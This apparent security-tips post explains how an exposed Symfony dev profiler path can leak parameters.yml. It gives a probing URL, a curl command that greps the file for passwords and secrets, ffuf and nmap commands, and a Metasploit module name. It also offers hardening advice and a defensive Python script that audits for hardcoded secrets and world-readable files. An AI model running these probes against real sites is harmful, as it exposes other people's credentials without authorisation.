Web frameworks often contain hidden paths that can expose sensitive configuration files. One such example is the Symfony PHP framework, where appending `/app_dev.php/_profiler/open?file=app/config/parameters.yml` to the target URL may reveal database credentials, API keys, and other critical data.
You Should Know:
1. Manual Testing:
- Navigate to:
http://target-site.com/app_dev.php/_profiler/open?file=app/config/parameters.yml
- If the Symfony profiler is enabled, this may return the `parameters.yml` file.
2. Automated Scanning with Curl:
curl -s "http://target-site.com/app_dev.php/_profiler/open?file=app/config/parameters.yml" | grep -E "database_password|secret|key"
3. Using FFUF for Bruteforcing:
ffuf -w /path/to/wordlist.txt -u "http://target-site.com/FUZZ" -mr "parameters.yml"
(Add the path to your wordlist)
4. Exploiting with Metasploit:
- Use the `auxiliary/scanner/http/symfony_debug_rce` module if debug mode is enabled.
5. Securing Symfony Applications:
- Disable `app_dev.php` in production.
- Restrict access to `/_profiler/` paths.
- Use environment variables instead of hardcoding secrets in `parameters.yml`.
Additional Commands for Security Testing:
- Check for Open Debug Mode:
nmap -p 80,443 --script http-symfony-debug <target-IP>
- Extract Secrets from Exposed Configs:
grep -rE "password|secret" /var/www/html/
- Linux File Permission Check:
find /var/www/ -type f -name "*.yml" -perm -o+r -ls
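As an added example (not from the original post), the two defensive checks above, moving secrets out of `parameters.yml` into environment variables and the world-readable-file check, as one audit script. It assumes the usual flat `parameters:` layout and Symfony's `%env(NAME)%` placeholder syntax; the sample YAML and the temp directory it builds are constructed fixtures.

```python
import os, re, stat, tempfile
# Keys that usually carry secrets in a Symfony parameters.yml (naming-convention assumption).
SECRET_KEY_RE = re.compile(r"(password|secret|token|key)$", re.I)
# Symfony resolves %env(NAME)% from the environment at runtime; anything else is a literal.
ENV_PLACEHOLDER_RE = re.compile(r"^%env\([A-Za-z0-9_:]+\)%$")

def find_hardcoded_secrets(yaml_text):
    """(key, value) pairs under 'parameters:' whose key looks secret-bearing and whose
    value is a literal rather than an %env()% placeholder (flat key: value layout only)."""
    findings, in_params = [], False
    for raw in yaml_text.splitlines():
        line = re.sub(r"(^|\s)#.*$", "", raw).rstrip()  # drop YAML comments
        if not line.strip():
            continue
        if not line.startswith(" "):                     # top-level key
            in_params = line.strip() == "parameters:"
            continue
        if in_params and ":" in line:
            key, _, value = line.strip().partition(":")
            value = value.strip().strip("'\"")
            if (SECRET_KEY_RE.search(key) and value not in ("", "~", "null")
                    and not ENV_PLACEHOLDER_RE.match(value)):
                findings.append((key, value))
    return findings

def world_readable_ymls(config_dir):
    """*.yml files under config_dir readable by 'other' (what find -perm -o+r reports)."""
    return sorted(os.path.join(root, f) for root, _, files in os.walk(config_dir)
                  for f in files if f.endswith(".yml")
                  and os.stat(os.path.join(root, f)).st_mode & stat.S_IROTH)

SAMPLE_PARAMETERS_YML = """\
# constructed sample, not a real deployment
parameters:
    database_host: 127.0.0.1
    database_password: 'S3cr3t-literal'        # hardcoded: should be flagged
    mailer_password: '%env(MAILER_PASSWORD)%'  # read from the environment: fine
    secret: ThisTokenIsNotSoSecretChangeIt     # hardcoded: should be flagged
"""

def build_demo_config_dir():
    """Constructed fixture: a temp app/config with one world-readable and one private yml."""
    cfg = os.path.join(tempfile.mkdtemp(), "app", "config")
    os.makedirs(cfg)
    for name, mode in (("parameters.yml", 0o644), ("security.yml", 0o640)):
        path = os.path.join(cfg, name)
        with open(path, "w") as fh:
            fh.write(SAMPLE_PARAMETERS_YML)
        os.chmod(path, mode)
    return cfg
```

Run `find_hardcoded_secrets` over the real `app/config/parameters.yml` and `world_readable_ymls` over `app/config/` on the server being audited; any hit is a secret to move into the environment or a file whose mode to tighten.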
What Undercode Says:
Exposed configuration files in web frameworks remain a common attack vector. Always verify debug modes, restrict sensitive paths, and encrypt secrets. For defenders, automated scanning for such misconfigurations should be part of routine security audits.
Expected Output:
- Database credentials, API keys, or encryption secrets from `parameters.yml`.
- A 200 OK response confirming file access.
Reported By: Zlatanh If – Hackers Feeds